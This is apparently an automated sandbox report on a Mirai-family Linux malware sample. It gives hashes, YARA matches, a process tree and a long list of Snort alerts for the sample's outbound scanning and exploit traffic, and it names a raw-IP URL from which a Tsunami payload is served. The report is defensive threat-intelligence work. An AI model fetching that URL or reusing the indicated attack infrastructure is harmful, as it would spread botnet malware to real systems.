Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
VC3SWrkssz

Overview

General Information

Sample Name:VC3SWrkssz
Analysis ID:626433
MD5:981e959599e29b1d9a2968bbf6387bae
SHA1:258686ffea44f41925fd5af6724e69b241079013
SHA256:dc80f285f9f5077f475dbbb184dbcfbbd32f55c2a15bb80dd04bd1ebf7468978
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample contains only a LOAD segment without any section mappings
Yara signature match
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
HTTP GET or POST without a user agent
Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:626433
Start date and time: 14/05/202202:03:072022-05-14 02:03:07 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 23s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:VC3SWrkssz
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal92.spre.troj.evad.lin@0/0@0/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: http://103.136.43.52/bins/Tsunami.x86

Runtime Messages

Command:/tmp/VC3SWrkssz
PID:6223
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
kebabware installed
Standard Error:

Process Tree

  • system is lnxubuntu20
  • VC3SWrkssz (PID: 6223, Parent: 6121, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/VC3SWrkssz
  • sh (PID: 6281, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • rm (PID: 6311, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
VC3SWrksszSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x85d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x863f:$s2: $Id: UPX
  • 0x85f0:$s3: $Info: This file is packed with the UPX executable packer

Memory Dumps

SourceRuleDescriptionAuthorStrings
6228.1.000000008254e41a.0000000043337d44.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x14f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6223.1.000000008254e41a.0000000043337d44.rw-.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x14f0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1560:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x1620:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x21d60:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x21dbc:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x21e58:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmpMAL_ELF_LNX_Mirai_Oct10_2Detects ELF malware Mirai relatedFlorian Roth
  • 0x20fe0:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6223.1.0000000051b72c78.000000009a6fa781.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
    Click to see the 5 entries

    Snort Signatures

    Timestamp:192.168.2.23172.65.225.19835486555552027153 05/14/22-02:04:11.637927
    SID:2027153
    Source Port:35486
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.245.55.12540780528692027339 05/14/22-02:05:10.063522
    SID:2027339
    Source Port:40780
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.247.4656298802027121 05/14/22-02:05:16.496663
    SID:2027121
    Source Port:56298
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.64.9842844555552027153 05/14/22-02:05:20.995117
    SID:2027153
    Source Port:42844
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.48.2645906555552027153 05/14/22-02:05:54.037647
    SID:2027153
    Source Port:45906
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.218.156.21445324802027121 05/14/22-02:05:04.368184
    SID:2027121
    Source Port:45324
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.123.7840044555552027153 05/14/22-02:04:34.703644
    SID:2027153
    Source Port:40044
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.209.159.21034302802027121 05/14/22-02:04:45.560206
    SID:2027121
    Source Port:34302
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.79.2647988528692027339 05/14/22-02:04:47.625880
    SID:2027339
    Source Port:47988
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.100.202.19760688802027121 05/14/22-02:04:17.306136
    SID:2027121
    Source Port:60688
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.94.67.1535236802027121 05/14/22-02:04:02.248726
    SID:2027121
    Source Port:35236
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.198.233.19751822802027121 05/14/22-02:04:21.714018
    SID:2027121
    Source Port:51822
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.160.72.15148858802027121 05/14/22-02:04:55.282834
    SID:2027121
    Source Port:48858
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.175.16044936555552027153 05/14/22-02:05:43.540529
    SID:2027153
    Source Port:44936
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.246.6760502555552027153 05/14/22-02:05:45.978345
    SID:2027153
    Source Port:60502
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.245.15651872555552027153 05/14/22-02:04:27.970733
    SID:2027153
    Source Port:51872
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.43.15360046802027121 05/14/22-02:04:49.296960
    SID:2027121
    Source Port:60046
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.40.18455754555552027153 05/14/22-02:04:34.721447
    SID:2027153
    Source Port:55754
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.170.142.9154540802027121 05/14/22-02:05:16.526766
    SID:2027121
    Source Port:54540
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.243.17456044555552027153 05/14/22-02:05:43.557862
    SID:2027153
    Source Port:56044
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.83.120.5454084802027121 05/14/22-02:04:55.111233
    SID:2027121
    Source Port:54084
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.254.55.12150998528692027339 05/14/22-02:04:39.323189
    SID:2027339
    Source Port:50998
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.247.4456996555552027153 05/14/22-02:04:27.965299
    SID:2027153
    Source Port:56996
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.12.181.23545164802027121 05/14/22-02:05:06.625031
    SID:2027121
    Source Port:45164
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.66.14948008555552027153 05/14/22-02:05:09.761803
    SID:2027153
    Source Port:48008
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.35.5552384555552027153 05/14/22-02:05:54.037779
    SID:2027153
    Source Port:52384
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.238.52.23344316528692027339 05/14/22-02:04:03.540343
    SID:2027339
    Source Port:44316
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.124.744862802027121 05/14/22-02:04:07.843399
    SID:2027121
    Source Port:44862
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.151.120.23954210802027121 05/14/22-02:04:04.413192
    SID:2027121
    Source Port:54210
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23197.234.59.17640198372152835222 05/14/22-02:04:48.680620
    SID:2835222
    Source Port:40198
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.227.22344588802027121 05/14/22-02:04:55.265828
    SID:2027121
    Source Port:44588
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.176.12349208555552027153 05/14/22-02:04:01.919544
    SID:2027153
    Source Port:49208
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.116.145.17253718802027121 05/14/22-02:04:19.393127
    SID:2027121
    Source Port:53718
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.188.114.16159740802027121 05/14/22-02:03:57.828010
    SID:2027121
    Source Port:59740
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.210.8052764555552027153 05/14/22-02:04:07.308990
    SID:2027153
    Source Port:52764
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.130.227.21954724802027121 05/14/22-02:04:09.253114
    SID:2027121
    Source Port:54724
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.73.184.9855062802027121 05/14/22-02:05:00.755463
    SID:2027121
    Source Port:55062
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.245.46.10746162528692027339 05/14/22-02:04:51.923330
    SID:2027339
    Source Port:46162
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.247.21.12942964528692027339 05/14/22-02:05:32.842628
    SID:2027339
    Source Port:42964
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.166.126.9450592802027121 05/14/22-02:04:25.514613
    SID:2027121
    Source Port:50592
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.217.139.18940702802027121 05/14/22-02:04:23.234556
    SID:2027121
    Source Port:40702
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.58.7852418555552027153 05/14/22-02:05:24.859914
    SID:2027153
    Source Port:52418
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.244.24633926555552027153 05/14/22-02:04:52.963336
    SID:2027153
    Source Port:33926
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.167.21250504555552027153 05/14/22-02:05:46.355886
    SID:2027153
    Source Port:50504
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.34.6.15055186802027121 05/14/22-02:04:11.024463
    SID:2027121
    Source Port:55186
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.227.12641560802027121 05/14/22-02:04:19.423556
    SID:2027121
    Source Port:41560
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.150.188.18546066802027121 05/14/22-02:05:22.993162
    SID:2027121
    Source Port:46066
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.44.2540066555552027153 05/14/22-02:03:55.485637
    SID:2027153
    Source Port:40066
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.216.50.13837606802027121 05/14/22-02:04:01.004807
    SID:2027121
    Source Port:37606
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.211.210.9335332802027121 05/14/22-02:04:40.769456
    SID:2027121
    Source Port:35332
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.41.9237008555552027153 05/14/22-02:04:22.454733
    SID:2027153
    Source Port:37008
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.247.2036634802027121 05/14/22-02:04:41.120142
    SID:2027121
    Source Port:36634
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.207.22452754555552027153 05/14/22-02:04:46.156570
    SID:2027153
    Source Port:52754
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.230.24.14839870528692027339 05/14/22-02:04:37.094159
    SID:2027339
    Source Port:39870
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.208.209.1350344802027121 05/14/22-02:04:13.122146
    SID:2027121
    Source Port:50344
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.228.24052510802027121 05/14/22-02:04:11.012752
    SID:2027121
    Source Port:52510
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.99.5954200802027121 05/14/22-02:04:04.419952
    SID:2027121
    Source Port:54200
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.86.6346324555552027153 05/14/22-02:03:58.555530
    SID:2027153
    Source Port:46324
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.253.16356128555552027153 05/14/22-02:04:24.881877
    SID:2027153
    Source Port:56128
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.59.181.20043136802027121 05/14/22-02:05:19.833635
    SID:2027121
    Source Port:43136
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.100.207.12150102802027121 05/14/22-02:04:21.836564
    SID:2027121
    Source Port:50102
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.241.14.13254672528692027339 05/14/22-02:04:16.821957
    SID:2027339
    Source Port:54672
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.158.153.18444468802027121 05/14/22-02:05:16.432488
    SID:2027121
    Source Port:44468
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.241.23657156555552027153 05/14/22-02:04:39.318465
    SID:2027153
    Source Port:57156
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.226.94.18941406528692027339 05/14/22-02:05:39.652328
    SID:2027339
    Source Port:41406
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.129.188.9241166802027121 05/14/22-02:04:19.399830
    SID:2027121
    Source Port:41166
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.166.2240758555552027153 05/14/22-02:05:46.355727
    SID:2027153
    Source Port:40758
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.183.38.11852836802027121 05/14/22-02:04:50.334131
    SID:2027121
    Source Port:52836
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.135.148.19540620802027121 05/14/22-02:04:55.124093
    SID:2027121
    Source Port:40620
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.75.6257084555552027153 05/14/22-02:05:34.766951
    SID:2027153
    Source Port:57084
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.204.10138326555552027153 05/14/22-02:04:43.912984
    SID:2027153
    Source Port:38326
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.180.140.2447310802027121 05/14/22-02:04:36.685245
    SID:2027121
    Source Port:47310
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.195.2.15755260802027121 05/14/22-02:04:04.435272
    SID:2027121
    Source Port:55260
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.151.120.23954354802027121 05/14/22-02:04:10.940346
    SID:2027121
    Source Port:54354
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.67.9056662555552027153 05/14/22-02:04:56.047288
    SID:2027153
    Source Port:56662
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.102.5144754555552027153 05/14/22-02:04:56.030167
    SID:2027153
    Source Port:44754
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.128.74.8046640802027121 05/14/22-02:04:17.251115
    SID:2027121
    Source Port:46640
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.164.1748162555552027153 05/14/22-02:04:22.472015
    SID:2027153
    Source Port:48162
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.83.121.22158894802027121 05/14/22-02:04:27.640751
    SID:2027121
    Source Port:58894
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.169.219.25434272802027121 05/14/22-02:04:45.846183
    SID:2027121
    Source Port:34272
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23184.105.8.3736406555552027153 05/14/22-02:05:18.793782
    SID:2027153
    Source Port:36406
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.215.97.13935584802027121 05/14/22-02:04:25.532039
    SID:2027121
    Source Port:35584
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.224.15.17039200528692027339 05/14/22-02:04:39.797114
    SID:2027339
    Source Port:39200
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.213.15.3151808802027121 05/14/22-02:04:17.286891
    SID:2027121
    Source Port:51808
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.218.95.11037924802027121 05/14/22-02:05:28.503764
    SID:2027121
    Source Port:37924
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.252.227.9960514802027121 05/14/22-02:04:57.392496
    SID:2027121
    Source Port:60514
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.167.1439002555552027153 05/14/22-02:05:09.758951
    SID:2027153
    Source Port:39002
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.209.80.20855570802027121 05/14/22-02:03:55.571475
    SID:2027121
    Source Port:55570
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.245.196.21055214555552027153 05/14/22-02:05:06.317529
    SID:2027153
    Source Port:55214
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23156.244.77.14443746528692027339 05/14/22-02:05:07.644328
    SID:2027339
    Source Port:43746
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.137.15542484802027121 05/14/22-02:04:07.907810
    SID:2027121
    Source Port:42484
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.252.26.14258998528692027339 05/14/22-02:04:30.267679
    SID:2027339
    Source Port:58998
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.228.15633432555552027153 05/14/22-02:05:45.978228
    SID:2027153
    Source Port:33432
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.211.109.3948768802027121 05/14/22-02:04:57.363312
    SID:2027121
    Source Port:48768
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.215.16.24440964802027121 05/14/22-02:05:36.611945
    SID:2027121
    Source Port:40964
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.250.175.20859942802027121 05/14/22-02:05:33.036125
    SID:2027121
    Source Port:59942
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.176.21437726802027121 05/14/22-02:05:02.940383
    SID:2027121
    Source Port:37726
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.254.51.13348970528692027339 05/14/22-02:05:53.246860
    SID:2027339
    Source Port:48970
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.181.217.21542428802027121 05/14/22-02:04:01.013042
    SID:2027121
    Source Port:42428
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.149.22744978555552027153 05/14/22-02:03:55.468539
    SID:2027153
    Source Port:44978
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.100.151.5036050802027121 05/14/22-02:05:04.113713
    SID:2027121
    Source Port:36050
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.226.51.2659756528692027339 05/14/22-02:03:58.608037
    SID:2027339
    Source Port:59756
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.44.136.16858910802027121 05/14/22-02:05:06.494711
    SID:2027121
    Source Port:58910
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.245.43.1833638528692027339 05/14/22-02:04:34.638673
    SID:2027339
    Source Port:33638
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23156.250.92.8149400528692027339 05/14/22-02:05:30.387325
    SID:2027339
    Source Port:49400
    Destination Port:52869
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.122.12941910802027121 05/14/22-02:03:57.733650
    SID:2027121
    Source Port:41910
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.198.82.13638664802027121 05/14/22-02:04:36.621117
    SID:2027121
    Source Port:38664
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.207.159.1842422802027121 05/14/22-02:04:04.430182
    SID:2027121
    Source Port:42422
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.56.213.8036770802027121 05/14/22-02:04:50.593818
    SID:2027121
    Source Port:36770
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.159.14.9236796802027121 05/14/22-02:04:01.047400
    SID:2027121
    Source Port:36796
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.58.5948210802027121 05/14/22-02:05:00.726341
    SID:2027121
    Source Port:48210
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.45.6035894555552027153 05/14/22-02:04:31.062264
    SID:2027153
    Source Port:35894
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2395.72.28.18446380802027121 05/14/22-02:03:57.766923
    SID:2027121
    Source Port:46380
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.174.2055300555552027153 05/14/22-02:03:58.555577
    SID:2027153
    Source Port:55300
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.2.22159362555552027153 05/14/22-02:05:09.758996
    SID:2027153
    Source Port:59362
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.151.120.23954256802027121 05/14/22-02:04:07.815463
    SID:2027121
    Source Port:54256
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.221.155.4942002802027121 05/14/22-02:05:52.526130
    SID:2027121
    Source Port:42002
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23184.175.126.5651794555552027153 05/14/22-02:05:04.444249
    SID:2027153
    Source Port:51794
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.23172.65.85.5640568555552027153 05/14/22-02:04:07.291997
    SID:2027153
    Source Port:40568
    Destination Port:55555
    Protocol:TCP
    Classtype:Attempted Administrator Privilege Gain
    Timestamp:192.168.2.2388.221.137.23833006802027121 05/14/22-02:05:25.192641
    SID:2027121
    Source Port:33006
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.69.25058292802027121 05/14/22-02:04:01.004594
    SID:2027121
    Source Port:58292
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2395.101.188.6034116802027121 05/14/22-02:04:04.484302
    SID:2027121
    Source Port:34116
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.166.227.13336224802027121 05/14/22-02:04:43.350949
    SID:2027121
    Source Port:36224
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.2388.147.126.18944674802027121 05/14/22-02:04:45.457773
    SID:2027121
    Source Port:44674
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.23172.65.33.10843492555552027153 05/14/22-02:03:58.572506
    SID:2027153
    Source Port:43492
